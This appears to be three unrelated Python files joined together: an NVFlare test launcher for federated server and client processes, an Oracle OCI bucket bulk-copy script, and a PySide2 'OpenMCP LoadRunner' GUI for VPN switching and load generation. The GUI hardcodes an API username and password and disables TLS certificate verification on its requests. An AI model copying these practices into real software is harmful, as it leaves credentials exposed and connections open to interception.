# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import shlex
import shutil
import signal
import subprocess
import sys
import tempfile
import threading
import traceback
def process_logs(log_path, pid):
try:
with open(log_path, "ab") as file:
for line in pid.stdout: # b'\n'-separated lines
sys.stdout.buffer.write(line) # pass bytes as is
file.write(line)
file.flush()
except BaseException as e:
traceback.print_exc()
print(f"Exception in process_logs for file {log_path}: {e.__str__()}")
class SiteLauncher(object):
def __init__(
self, poc_directory, server_dir_name="server", client_dir_name="client", admin_dir_name="admin", app_path=None
):
"""
This class sets up the test environment for a test. It will launch and keep track of servers and clients.
"""
super().__init__()
self.original_poc_directory = poc_directory
self.server_dir_name = server_dir_name
self.client_dir_name = client_dir_name
self.admin_dir_name = admin_dir_name
self.app_path = app_path
self.server_properties = {}
self.client_properties = {}
self.admin_api = None
self.logger = logging.getLogger("SiteLauncher")
# Create temporary poc directory
if not os.path.exists(self.original_poc_directory):
raise RuntimeError("Please run POC command first and provide the POC path!")
# TODO: What is log directory and should it be added here?
root_dir = tempfile.mkdtemp()
if os.path.exists(root_dir):
shutil.rmtree(root_dir)
shutil.copytree(self.original_poc_directory, root_dir)
self.poc_directory = root_dir
print(f"Using root dir: {root_dir}")
def start_server(self):
server_dir = os.path.join(self.poc_directory, self.server_dir_name)
log_path = os.path.join(server_dir, "log.txt")
new_env = os.environ.copy()
# Create upload directory
os.makedirs(os.path.join(server_dir, "transfer"), exist_ok=True)
command = (
f"{sys.executable} -m nvflare.private.fed.app.server.server_train "
f"-m {server_dir} -s fed_server.json"
f" --set secure_train=false config_folder=config"
)
process = subprocess.Popen(
shlex.split(command, " "),
preexec_fn=os.setsid,
env=new_env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
print("Starting server ...")
t = threading.Thread(target=process_logs, args=(log_path, process))
t.start()
self.server_properties["path"] = server_dir
self.server_properties["process"] = process
self.server_properties["log_path"] = log_path
def start_clients(self, n=2):
# Make sure that previous clients are killed
self.stop_all_clients()
self.client_properties.clear()
# For each client, copy the directory
src_client_directory = os.path.join(self.poc_directory, self.client_dir_name)
new_env = os.environ.copy()
for i in range(n):
client_id = i
client_name = self.client_dir_name + f"_{client_id}"
# Copy and create new directory
client_dir_name = os.path.join(self.poc_directory, client_name)
shutil.copytree(src_client_directory, client_dir_name)
log_path = os.path.join(client_dir_name, "log.txt")
self.client_properties[client_id] = {}
self.client_properties[client_id]["path"] = client_dir_name
self.client_properties[client_id]["name"] = client_name
self.client_properties[client_id]["log_path"] = log_path
# Launch the new client
client_startup_dir = os.path.join(client_dir_name)
command = (
f"{sys.executable} -m nvflare.private.fed.app.client.client_train -m "
f"{client_startup_dir} -s fed_client.json --set secure_train=false config_folder=config"
f" uid=client_{client_id}"
)
process = subprocess.Popen(
shlex.split(command, " "),
preexec_fn=os.setsid,
env=new_env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.client_properties[client_id]["process"] = process
print(f"Launched client {client_id} process.")
t = threading.Thread(target=process_logs, args=(log_path, process))
t.start()
def get_server_data(self):
if "log_file" in self.server_properties:
self.server_properties["log_file"].flush()
server_data = {
"server_path": self.server_properties["path"],
"server_process": self.server_properties["process"],
"server_name": self.server_dir_name,
"root_dir": self.poc_directory,
"log_path": self.server_properties["log_path"],
}
return server_data
def get_client_data(self):
client_data = {
"client_paths": [self.client_properties[x]["path"] for x in self.client_properties],
"client_names": [self.client_properties[x]["name"] for x in self.client_properties],
"client_processes": [self.client_properties[x]["process"] for x in self.client_properties],
}
return client_data
def stop_server(self):
# Kill all clients first
try:
self.stop_all_clients()
# Kill the process
if "process" in self.server_properties and self.server_properties["process"]:
os.killpg(self.server_properties["process"].pid, signal.SIGTERM)
subprocess.call(["kill", str(self.server_properties["process"].pid)])
self.server_properties["process"].wait()
print("Sent SIGTERM to server.")
else:
print("No server process.")
except Exception as e:
print(f"Exception in stopping server: {e.__str__()}")
finally:
self.server_properties.clear()
def stop_client(self, client_id) -> bool:
if client_id not in self.client_properties:
print(f"Client {client_id} not present in client processes.")
return False
if not self.client_properties[client_id]["process"]:
print(f"Client {client_id} process is None.")
self.client_properties.pop(client_id)
return False
try:
os.killpg(self.client_properties[client_id]["process"].pid, signal.SIGTERM)
subprocess.call(["kill", str(self.client_properties[client_id]["process"].pid)])
self.client_properties[client_id]["process"].wait()
self.client_properties.pop(client_id)
print(f"Sent SIGTERM to client {client_id}.")
except Exception as e:
print(f"Exception in stopping client {client_id}: {e.__str__()}")
return False
return True
def stop_all_clients(self):
client_ids = list(self.client_properties.keys())
for client_id in client_ids:
self.stop_client(client_id)
def stop_all_sites(self):
self.stop_server()
def finalize(self):
print(f"Deleting temporary directory: {self.poc_directory}.")
shutil.rmtree(self.poc_directory)
|
object_storage_bulk_copy.py | # coding: utf-8
# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
##########################################################################
# object_storage_bulk_copy.py
#
# @author: Tim S and Adi Z
#
# Supports Python 3
##########################################################################
# Info:
# Bulk copy object storage bucket to other bucket with parallel threads
#
##########################################################################
# Application Command line parameters
#
# -c config - Config file section to use (tenancy profile)
# -t profile - Profile in config file, DEFAULT as default
# -p proxy - Set Proxy (i.e. www-proxy-server.com:80)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -sb source_bucket
# -sr source_region
# -sn source_namespace
# -sp source_prefix_include
# -se source_prefix_exclude
# -db destination_bucket
# -dr destination_region
# -ig ignore_check_exist
##########################################################################
import pickle
import threading
import time
import queue
import oci
import argparse
import datetime
import sys
import os
##########################################################################
# Pre Main
##########################################################################
# Get Command Line Parser
parser = argparse.ArgumentParser()
parser.add_argument('-t', default="", dest='config_profile', help='Config file section to use (tenancy profile)')
parser.add_argument('-p', default="", dest='proxy', help='Set Proxy (i.e. www-proxy-server.com:80) ')
parser.add_argument('-ip', action='store_true', default=False, dest='is_instance_principals', help='Use Instance Principals for Authentication')
parser.add_argument('-dt', action='store_true', default=False, dest='is_delegation_token', help='Use Delegation Token for Authentication')
parser.add_argument('-c', default="", dest='config_file', help="Config File (default=~/.oci/config)")
parser.add_argument('-sb', default="", dest='source_bucket', help='Source Bucket Name')
parser.add_argument('-sr', default="", dest='source_region', help='Source Region (Default current connection)')
parser.add_argument('-sn', default="", dest='source_namespace', help='Source Namespace (Default current connection)')
parser.add_argument('-sp', default="", dest='source_prefix_include', help='Source Prefix Include')
parser.add_argument('-se', default="", dest='source_prefix_exclude', help='Source Prefix Exclude')
parser.add_argument('-db', default="", dest='destination_bucket', help='Destination Bucket Name')
parser.add_argument('-dr', default="", dest='destination_region', help='Destination Region')
parser.add_argument('-dn', default="", dest='destination_namespace', help='Destination Namespace (Default current connection)')
parser.add_argument('-ig', action='store_true', default=False, dest='ignore_exist', help='Ignore Check if files exist at Destination')
cmd = parser.parse_args()
if len(sys.argv) < 2:
parser.print_help()
raise SystemExit
if not cmd.source_bucket or not cmd.destination_bucket:
print("Source and Destination buckets parameters are required !!!\n")
parser.print_help()
raise SystemExit
# Worker configuration
request_worker_count = 50
status_worker_count = 50
status_interval = 60
# Try timeout
base_retry_timeout = 2
max_retry_timeout = 16**2
# Global Variables and queues
data = {}
data_lock = threading.Lock()
dest_bucket_memory = {}
known_q = queue.Queue()
update_q = queue.Queue()
# Global Variables
object_storage_client = None
object_storage_client_dest = None
source_bucket = cmd.source_bucket
source_region = cmd.source_region
source_namespace = cmd.source_namespace
destination_namespace = cmd.destination_namespace
source_prefix = cmd.source_prefix_include
source_prefix_exclude = cmd.source_prefix_exclude
destination_bucket = cmd.destination_bucket
destination_region = cmd.destination_region
state_file = source_bucket + "." + destination_bucket + ".wrk"
# Update Variables based on the parameters
config_file = (cmd.config_file if cmd.config_file else oci.config.DEFAULT_LOCATION)
config_profile = (cmd.config_profile if cmd.config_profile else oci.config.DEFAULT_PROFILE)
##########################################################################
# Create signer for Authentication
# Input - config_file, config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_file, config_profile, is_instance_principals, is_delegation_token):
# if instance principals authentications
if is_instance_principals:
try:
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
config = {'region': signer.region, 'tenancy': signer.tenancy_id}
return config, signer
except Exception:
print_header("Error obtaining instance principals certificate, aborting")
raise SystemExit
# -----------------------------
# Delegation Token
# -----------------------------
elif is_delegation_token:
try:
# check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
env_config_file = os.environ.get('OCI_CONFIG_FILE')
env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
# check if file exist
if env_config_file is None or env_config_section is None:
print("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
print("")
raise SystemExit
config = oci.config.from_file(env_config_file, env_config_section)
delegation_token_location = config["delegation_token_file"]
with open(delegation_token_location, 'r') as delegation_token_file:
delegation_token = delegation_token_file.read().strip()
# get signer from delegation token
signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
return config, signer
except KeyError:
print("* Key Error obtaining delegation_token_file")
raise SystemExit
except Exception:
raise
# -----------------------------
# config file authentication
# -----------------------------
else:
config = oci.config.from_file(
(config_file if config_file else oci.config.DEFAULT_LOCATION),
(config_profile if config_profile else oci.config.DEFAULT_PROFILE)
)
signer = oci.signer.Signer(
tenancy=config["tenancy"],
user=config["user"],
fingerprint=config["fingerprint"],
private_key_file_location=config.get("key_file"),
pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
private_key_content=config.get("key_content")
)
return config, signer
##############################################################################
# get time
##############################################################################
def get_time(full=False):
if full:
return str(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"))
else:
return str(datetime.datetime.now().strftime("%H:%M:%S"))
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
chars = int(90)
print("")
print('#' * chars)
print("#" + name.center(chars - 2, " ") + "#")
print('#' * chars)
##########################################################################
# Print Info
##########################################################################
def print_command_info():
print_header("Running Object Storage Bulk Copy")
print("Written by Tim S and Adi Z, July 2020")
print("Starts at : " + get_time(True))
print("Command Line : " + ' '.join(x for x in sys.argv[1:]))
print("Source Namespace : " + source_namespace)
print("Source Region : " + source_region)
print("Source Bucket : " + source_bucket)
print("Source Prefix : " + source_prefix)
print("Dest Namespace : " + destination_namespace)
print("Dest Region : " + destination_region)
print("Dest Bucket : " + destination_bucket)
print("State File : " + state_file)
##############################################################################
# copy_request_worker
##############################################################################
def copy_request_worker():
while True:
object_ = known_q.get()
state = get_state_for_object(object_)
response = None
interval_exp = base_retry_timeout
while True:
try:
response = copy_object(source_namespace, source_bucket, object_, destination_namespace, destination_region, destination_bucket, object_)
break
except Exception:
if interval_exp > max_retry_timeout:
raise
print(" Received %s from API for object %s, will wait %s seconds before retrying." % (response.status, object_, interval_exp))
time.sleep(interval_exp)
interval_exp **= 2
continue
state['work-request-id'] = response.headers.get('opc-work-request-id')
state['status'] = 'REQUESTED'
set_state_for_object(object_, state, persist=False)
known_q.task_done()
##############################################################################
# work_request_status_worker
##############################################################################
def work_request_status_worker():
while True:
object_ = update_q.get()
state = get_state_for_object(object_)
interval_exp = base_retry_timeout
while True:
try:
response = object_storage_client.get_work_request(state['work-request-id'])
state['status'] = response.data.status
break
except Exception:
if interval_exp > max_retry_timeout:
raise
print(" Received %s from API for work request %s, will wait %s seconds before retrying." % (response.status, state['work-request-id'], interval_exp))
time.sleep(interval_exp)
interval_exp **= 2
continue
set_state_for_object(object_, state, persist=False)
update_q.task_done()
##############################################################################
# add_objects_to_queue
##############################################################################
def load_dest_bucket_to_mem(object_storage_client_dest, destination_namespace, destination_bucket):
global dest_bucket_memory
loaded_page = 0
next_starts_with = None
while True:
response = object_storage_client_dest.list_objects(destination_namespace, destination_bucket, start=next_starts_with, prefix=source_prefix, fields="md5", retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
next_starts_with = response.data.next_start_with
if loaded_page % 100 == 0 and loaded_page > 0:
print(get_time() + " - Loaded " + str(len(dest_bucket_memory)) + " files...")
for osb in response.data.objects:
dest_bucket_memory[str(osb.name)] = str(osb.md5)
if not next_starts_with:
break
loaded_page += 1
print(get_time() + " - Loaded " + str(len(dest_bucket_memory)) + " files.")
##############################################################################
# add_objects_to_queue
##############################################################################
def add_objects_to_queue(ns, bucket):
global known_q
global dest_bucket_memory
count = 0
skipped = 0
next_starts_with = None
while True:
response = object_storage_client.list_objects(ns, bucket, start=next_starts_with, prefix=source_prefix, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
next_starts_with = response.data.next_start_with
for object_ in response.data.objects:
if source_prefix and not object_.name.startswith(source_prefix):
continue
if source_prefix_exclude and object_.name.startswith(source_prefix_exclude):
continue
# skip if exist in the dest bucket (Option is to use MD5 for comparison)
if str(object_.name) in dest_bucket_memory:
skipped += 1
if skipped % 100000 == 0:
print(get_time() + " - Skipped " + str(skipped) + " exist files...")
continue
set_state_for_object(object_.name, {'status': 'KNOWN'}, persist=False)
known_q.put(object_.name)
count += 1
if count % 100000 == 0:
print(get_time() + " - Added " + str(count) + " files to queue...")
if not next_starts_with:
break
# if skipped files, print
if skipped > 0:
print(get_time() + " - Skipped " + str(skipped) + " exist files...")
save_all_state()
return count
##############################################################################
# set_state_for_object
##############################################################################
def set_state_for_object(object_, state, persist=True):
global data
data_lock.acquire()
data[object_] = state
if persist:
with open(state_file, 'wb') as sf:
pickle.dump(data, sf, protocol=pickle.HIGHEST_PROTOCOL)
data_lock.release()
return data[object_]
##############################################################################
# save_all_state
##############################################################################
def save_all_state():
data_lock.acquire()
with open(state_file, 'wb') as sf:
pickle.dump(data, sf, protocol=pickle.HIGHEST_PROTOCOL)
data_lock.release()
##############################################################################
# get_state_for_object
##############################################################################
def get_state_for_object(object_):
return data[object_]
##############################################################################
# get_work_request_count_by_status
##############################################################################
def get_work_request_count_by_status(status):
return len([x for x in data.keys() if data[x].get('status') == status])
##############################################################################
# copy_object
##############################################################################
def copy_object(src_ns, src_b, src_o, dst_ns, dst_r, dst_b, dst_o):
copy_request = oci.object_storage.models.copy_object_details.CopyObjectDetails()
copy_request.source_object_name = src_o
copy_request.destination_namespace = dst_ns
copy_request.destination_region = dst_r
copy_request.destination_bucket = dst_b
copy_request.destination_object_name = dst_o
return object_storage_client.copy_object(src_ns, src_b, copy_request)
##############################################################################
# update_all_work_requests_status
##############################################################################
def update_all_work_requests_status(ns, bucket):
for object_ in data.keys():
state = get_state_for_object(object_)
if state['status'] not in ('KNOWN', 'COMPLETED', 'FAILED', 'CANCELED'):
update_q.put(object_)
update_q.join()
save_all_state()
##############################################################################
# connect to objec storage
##############################################################################
def connect_to_object_storage():
# global parameters
global source_region
global destination_region
global source_namespace
global destination_namespace
global object_storage_client
global object_storage_client_dest
print_header("Connecting to Object Storage")
# get signer
config, signer = create_signer(cmd.config_file, cmd.config_profile, cmd.is_instance_principals, cmd.is_delegation_token)
# assign region from config file
if not source_region:
source_region = config['region']
if not destination_region:
destination_region = config['region']
try:
# connect to source region
print("\nConnecting to Object Storage Service for source region - " + source_region)
object_storage_client = oci.object_storage.ObjectStorageClient(config, signer=signer)
if cmd.proxy:
object_storage_client.base_client.session.proxies = {'https': cmd.proxy}
# retrieve namespace from object storage
if not source_namespace:
source_namespace = object_storage_client.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
print("Succeed.")
except Exception as e:
print("\nError connecting to object storage at source region - " + str(e))
raise SystemExit
try:
# connect to destination object storage
print("\nConnecting to Object Storage Service for destination region - " + destination_region)
config_destination = config
config_destination['region'] = destination_region
object_storage_client_dest = oci.object_storage.ObjectStorageClient(config_destination, signer=signer)
if cmd.proxy:
object_storage_client_dest.base_client.session.proxies = {'https': cmd.proxy}
# retrieve namespace from object storage
if not destination_namespace:
destination_namespace = object_storage_client_dest.get_namespace(retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY).data
print("Succeed.")
except Exception as e:
print("\nError connecting to object storage at destination region - " + str(e))
raise SystemExit
##############################################################################
# main
##############################################################################
def main():
# connect to object storage
connect_to_object_storage()
# print command info
print_command_info()
print_header("Start Processing")
print(get_time() + " - Creating %s copy request workers." % (request_worker_count))
for i in range(request_worker_count):
worker = threading.Thread(target=copy_request_worker)
worker.daemon = True
worker.start()
print(get_time() + " - Creating %s status workers." % (status_worker_count))
for i in range(status_worker_count):
worker = threading.Thread(target=work_request_status_worker)
worker.daemon = True
worker.start()
if not cmd.ignore_exist:
print(get_time() + " - Loading list of objects from destination bucket (%s) to ignore exiting files." % (destination_bucket))
load_dest_bucket_to_mem(object_storage_client_dest, destination_namespace, destination_bucket)
print(get_time() + " - Getting list of objects from source bucket (%s). Copies will start immediately." % (source_bucket))
count = add_objects_to_queue(source_namespace, source_bucket)
print(get_time() + " - Enqueued %s objects to be copied" % (count))
if count > 0:
print_header("Finish queuing files, start checking")
while count > 0:
print(get_time() + " - Waiting %s seconds before checking status." % (status_interval))
time.sleep(status_interval)
if get_work_request_count_by_status('KNOWN') > 0 or get_work_request_count_by_status('REQUESTED') > 0:
print(get_time() + " - Determining copy status")
update_all_work_requests_status(source_namespace, source_bucket)
data_lock.acquire()
print(get_time() + " - KNOWN: %s, REQUESTED: %s, COMPLETED: %s, FAILED: %s, CANCELED: %s"
% (
get_work_request_count_by_status('KNOWN'),
get_work_request_count_by_status('REQUESTED'),
get_work_request_count_by_status('COMPLETED'),
get_work_request_count_by_status('FAILED'),
get_work_request_count_by_status('CANCELED'))
)
if get_work_request_count_by_status('KNOWN') == 0 and get_work_request_count_by_status('REQUESTED') == 0:
data_lock.release()
break
else:
data_lock.release()
known_q.join()
print_header("Copy Completed at " + get_time())
##############################################################################
# Execute
##############################################################################
if __name__ == '__main__':
main()
|
ttt.py | import multiprocessing
import sys,time
from multiprocessing import Process, Event, Queue
from threading import Thread
from expressvpn import wrapper
from PySide2.QtCore import QCoreApplication, QSize, Qt, Signal, QThread, QProcess
import PySide2.QtGui, PySide2.QtWidgets as QtWidgets
from PySide2.QtWidgets import *
from wrapper import *
import requests
import os
import json
import socket
from Configure.configure import *
from MyObject.MyButton import *
from MyObject.MyComboBox import *
from MyObject.MyLabel import *
from MyObject.MyTextEdit import *
#ClusterList = {"1" : "10.0.0.1", "2" : "10.0.0.2", "3" : "10.0.0.3", "4" : "10.0.0.4"} # 클러스터 리스트
CountryList = {"USA - Los Angeles - 1" : "usla1", "Japan - Tokyo" : "jpto", "South Korea - 2" : "kr2"} # 나라 리스트
class SysbenchInfo():
def __init__(self, clusterName, svcIP, svcPort) -> None:
self.clusterName = clusterName
self.svcIP = svcIP
self.svcPort = svcPort
self.loadLevel = 0
class Form(QMainWindow):
def __init__(self):
super().__init__()
self.initVariable()
self.setupDefaultUI()
vpnlist()
self.buttonA_Init()
def moveEvent(self, event):
# print("check")
Global.winX = event.pos().x()
Global.winY = event.pos().y()
def initVariable(self):
self.processlist = [0,0,0,0]
# self.eventA = Event()
self.eventC = Event()
def setupDefaultUI(self):
self.setFixedSize(Global.winWidth,Global.winHeight)
self.setWindowTitle("OpenMCP LoadRunner")
self.MainWidget = QWidget(self)
self.setCentralWidget(self.MainWidget)
self.grid = QtWidgets.QGridLayout()
self.MainWidget.setLayout(self.grid)
# Up Left Widget 정의
self.upleftWidget= QWidget()
self.upleftLayout = QGridLayout()
self.upleftWidget.setLayout(self.upleftLayout)
self.amessage = MyLabel('External Client Connector')
self.amessage.setAlignment(Qt.AlignCenter)
self.alabel = MyLabel('국가:',3)
self.abuttonmessage = MyTextEdit("[Status] : <font color=\"red\">DisConnected</font>")
self.abuttonstart = MyButton('Connect',4)
self.acombobox = MyComboBox(2)
self.acombobox.addItems(CountryList)
self.abuttonstart.clicked.connect(self.buttonA_Start_event)
self.upleftLayout.addWidget(self.amessage,0,0,1,3)
self.upleftLayout.addWidget(self.alabel,1,0,1,1)
self.upleftLayout.addWidget(self.acombobox,1,1,1,1)
self.upleftLayout.addWidget(self.abuttonstart,1,2,1,1)
self.upleftLayout.addWidget(self.abuttonmessage,2,0,4,3)
# Up Right Widget 정의
self.uprightWidget= QWidget()
self.uprightLayout = QGridLayout()
self.uprightWidget.setLayout(self.uprightLayout)
self.cmessage = MyLabel('Traffic Sender')
self.cmessage.setAlignment(Qt.AlignCenter)
# self.cmessage.setStyleSheet("background-color : black; color : white; font-size: 14pt; font-weight: bold;")
# self.cmessage.setAlignment(Qt.AlignCenter)
self.clabel = MyLabel('동시 접속자 수:',3)
self.cbuttonmessage = MyTextEdit("[Status] : <font color=\"red\">Disable</font>")
self.cbuttonstart = MyButton('Send',4)
self.ccombobox = MyComboBox(2)
self.ccombobox.addItem("100")
self.ccombobox.addItem("150")
self.ccombobox.addItem("200")
self.ccombobox.addItem("1000")
self.ccombobox.addItem("5000")
self.ccombobox.addItem("10000")
self.ccombobox.addItem("50000")
self.ccombobox.addItem("100000")
#self.setStyle(self.cbuttonstart,1)
# self.setStyle(self.abuttonstop,2)
#self.setStyle(self.cmessage,6)
#self.setStyle(self.cbuttonmessage,7)
#self.setStyle(self.ccombobox,10)
self.cbuttonstart.clicked.connect(self.buttonC_Start_event)
# self.cbuttonstop.clicked.connect(self.buttonC_Stop_event)
self.uprightLayout.addWidget(self.cmessage,0,0,1,3)
self.uprightLayout.addWidget(self.clabel,1,0,1,1)
self.uprightLayout.addWidget(self.ccombobox,1,1,1,1)
self.uprightLayout.addWidget(self.cbuttonstart,1,2,1,1)
self.uprightLayout.addWidget(self.cbuttonmessage,2,0,4,3)
# upleftlayout.addWidget(abuttonstop,1,1)
# Down Left Widget 정의
self.downleftWidget = QWidget()
self.downleftLayout = QGridLayout()
self.downleftWidget.setLayout(self.downleftLayout)
self.bmessage = MyLabel('Load Generator')
# self.bmessage.setStyleSheet("background-color : black; color : white; font-size: 14pt; font-weight: bold;")
self.bmessage.setAlignment(Qt.AlignCenter)
self.bbuttonmessage = MyTextEdit("")
self.m_label_gif = QLabel()
self.m_label_gif.setText("aaa")
self.m_movie_gif = QtGui.QMovie("resources/image/Spin-1s-200px.gif")
self.m_label_gif.setMovie(self.m_movie_gif)
self.m_label_gif.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored )
self.m_label_gif.setScaledContents(True)
self.m_gif_flag = False
#Global.signal.stopBbtnCompleteSignal.connect(self.closeUI)
self.bbuttonstart = MyButton('Load', 2)
self.bbuttonstop = MyButton('Stop', 3)
#self.setStyle(self.bbuttonstart,1)
#self.setStyle(self.bbuttonstop,2)
# self.setStyle(self.bbuttonmessage,7)
# self.bbuttonstart.clicked.connect(self.buttonB_Start_event)
# self.bbuttonstop.clicked.connect(self.buttonB_Stop_event)
self.bcombobox = MyComboBox()
self.sysbenchInfoList = self.getSvcSysbenchs()
self.BClusterList = [Event() for i in range (0, len(self.sysbenchInfoList))]
for i in range(0, len(self.sysbenchInfoList)):
self.bcombobox.addItem(self.sysbenchInfoList[i].clusterName)
self.getLoadGenStatusAndSetText()
# for i in ClusterList:
# self.bcombobox.addItem(i)
# self.bcombobox.addItems(ClusterList)
self.bcombobox2 = MyComboBox()
self.bcombobox2.addItem("1")
self.bcombobox2.addItem("2")
self.bcombobox2.addItem("3")
self.bcombobox2.addItem("4")
self.bcombobox2.addItem("5")
self.bcombobox2.addItem("6")
# self.bcombobox2.addItem("Max")
self.blabel = MyLabel('Cluster:',3)
self.blabel2 = MyLabel('Load Level:',3)
self.bbuttonstart.clicked.connect(self.buttonB_Start_event)
self.bbuttonstop.clicked.connect(self.buttonB_Stop_event)
# self.bbuttonicon = PySide2.QtGui.QPixmap("assets/button3.png")
# self.bicon = PySide2.QtGui.QIcon(self.bbuttonicon)
# self.bbuttonstart.setIcon(self.bicon)
# self.bbuttonstart.setIconSize(self.bbuttonicon.rect().size())
# self.bbuttonstart.setIconSize(QSize(200,200))
# self.bbuttonstart.setFixedSize(self.bbuttonicon.rect().size())
#self.setStyle(self.bbuttonstart,3)
#self.setStyle(self.bbuttonstop,4)
#self.setStyle(self.bbuttonmessage,7)
#self.setStyle(self.bmessage,6)
#self.setStyle(self.bcombobox,10)
#self.setStyle(self.bcombobox2,10)
# self.downleftLayout.addWidget(self.bbuttonmessage,0,0,1,2)
# self.downleftLayout.addWidget(self.bbuttonstart,1,0)
# self.downleftLayout.addWidget(self.bbuttonstop,1,1)
self.downleftLayout.addWidget(self.bmessage,0,0,1,6)
self.downleftLayout.addWidget(self.blabel,1,0,1,1)
self.downleftLayout.addWidget(self.bcombobox,1,1,1,1)
self.downleftLayout.addWidget(self.blabel2,1,2,1,1)
self.downleftLayout.addWidget(self.bcombobox2,1,3,1,1)
self.downleftLayout.addWidget(self.bbuttonstart,1,4,1,1)
self.downleftLayout.addWidget(self.bbuttonstop,1,5,1,1)
self.downleftLayout.addWidget(self.bbuttonmessage,2,0,4,5)
self.downleftLayout.addWidget(self.m_label_gif,2,5,4,1)
self.upleftWidget.setSizePolicy(
QSizePolicy.Expanding,QSizePolicy.Expanding
)
self.uprightWidget.setSizePolicy(
QSizePolicy.Expanding,QSizePolicy.Expanding
)
self.downleftWidget.setSizePolicy(
QSizePolicy.Expanding,QSizePolicy.Expanding
)
# Main Layout에 각 Sub Widget들 배치
self.grid.addWidget(self.upleftWidget,0,0,1,1)
self.grid.addWidget(self.uprightWidget,0,1,1,1)
self.grid.addWidget(self.downleftWidget,1,0,1,2)
def getToken(self):
#run_command("echo -n | openssl s_client -connect openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > server.crt")
headers = {
'Content-type': 'application/json',
}
data = '{"username":"openmcp","password":"keti"}'
response = requests.post('https://openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080/token', headers=headers, data=data, verify=False)
#response = requests.post(tokenUrl, headers=headers, data=dict_data, verify=False)
print(response.status_code)
response.raise_for_status()
TOKEN = json.loads(response.text).get('token')
return TOKEN
def getAllClusterList(self):
clusterList = []
TOKEN = self.getToken()
headers = {
'Authorization': 'Bearer '+TOKEN,
}
params = (
('clustername', 'openmcp'),
)
url = "https://openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080/apis/core.kubefed.io/v1beta1/namespaces/kube-federation-system/kubefedclusters"
response = requests.get(url, headers=headers, params=params, verify=False)
print(response.status_code)
print(response.text)
response.raise_for_status()
loaded = json.loads(response.text)
for cluster in loaded.get('items'):
clusterName = cluster.get('metadata').get('name')
print("clusterName:", clusterName)
clusterList.append(clusterName)
return clusterList
def getSvcSysbenchs(self):
allClusterList = self.getAllClusterList()
sysbenchInfoList = []
TOKEN = self.getToken()
headers = {
'Authorization': 'Bearer '+TOKEN,
}
queue = Queue()
procs = []
for clusterName in allClusterList:
params = (
('clustername', clusterName),
)
proc = Process(target=self.getSvcSysbench,args=(clusterName, headers, params, queue))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
print("join complete", queue.qsize())
for i in range(queue.qsize()):
print("join complete" ,i)
try:
sysbenchInfoList.append(queue.get())
except:
print(queue.qsize())
print("get complete" )
return sysbenchInfoList
def getSvcSysbench(self, clusterName, headers, params, queue):
url = "https://openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080/api/v1/namespaces/"+Global.Load_Namespace+"/services/"+Global.Load_Svc_Name
try:
response = requests.get(url, headers=headers, params=params, verify=False, timeout=5)
except requests.exceptions.Timeout:
print(clusterName+' Timeout')
return
except Exception as e:
print(clusterName+ 'except', e)
return
print(clusterName, response.status_code)
response.raise_for_status()
if response.text != "":
#print(response.text)
loaded = json.loads(response.text)
svcIP = loaded.get('status').get('loadBalancer').get('ingress')[0].get('ip')
if svcIP == None:
svcIP = loaded.get('status').get('loadBalancer').get('ingress')[0].get('hostname')
svcPort = ""
for port in loaded.get('spec').get('ports'):
if port["name"] =="http-sysbench":
svcPort = port["port"]
break
print(clusterName, svcIP, svcPort)
p = SysbenchInfo(clusterName=clusterName,svcIP=svcIP,svcPort=svcPort)
print("q put")
queue.put(p)
return
def buttonA_Init(self):
if getStatus():
out = run_command(VPN_STATUS)
contry = ""
for item in out:
if "Connected to " in item:
contry = item.split("Connected to")[1]
break
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("pwnbit.kr",443))
self.abuttonmessage.setText("[Status] : <font color=\"green\">Connected</font><br>[Contry] : "+contry+"<br>[IPaddr] : "+sock.getsockname()[0])
self.abuttonstart.setText('DisConnect')
self.abuttonstart.setStyle(5)
else:
self.abuttonmessage.setText("[Status] : <font color=\"red\">DisConnected</font>")
self.abuttonstart.setText('Connect')
self.abuttonstart.setStyle(4)
def buttonA_func_Connect(self):
# while True:
print("A Connect func Text is :",self.acombobox.currentText())
alias = CountryList[self.acombobox.currentText()]
connect_alias(alias)
# if eventA.is_set():
# break
def buttonA_func_DisConnect(self):
# while True:
# print("A Disconnet func")
time.sleep(1)
disconnect()
print("disconnected")
# if eventA.is_set():
# break
def buttonA_Start_event(self): # 버튼 A 시작 이벤트 처리
# global eventA
if getStatus():
self.abuttonstart.setText("Connect")
self.abuttonstart.setStyle(4)
self.buttonA_func_DisConnect()
self.abuttonmessage.setText("[Status] : <font color=\"red\">DisConnected</font>")
self.processlist[0] = 0
else:
self.abuttonstart.setText("DisConnect")
self.abuttonstart.setStyle(5)
# if eventA.is_set():
# eventA = Event()
self.buttonA_func_Connect()
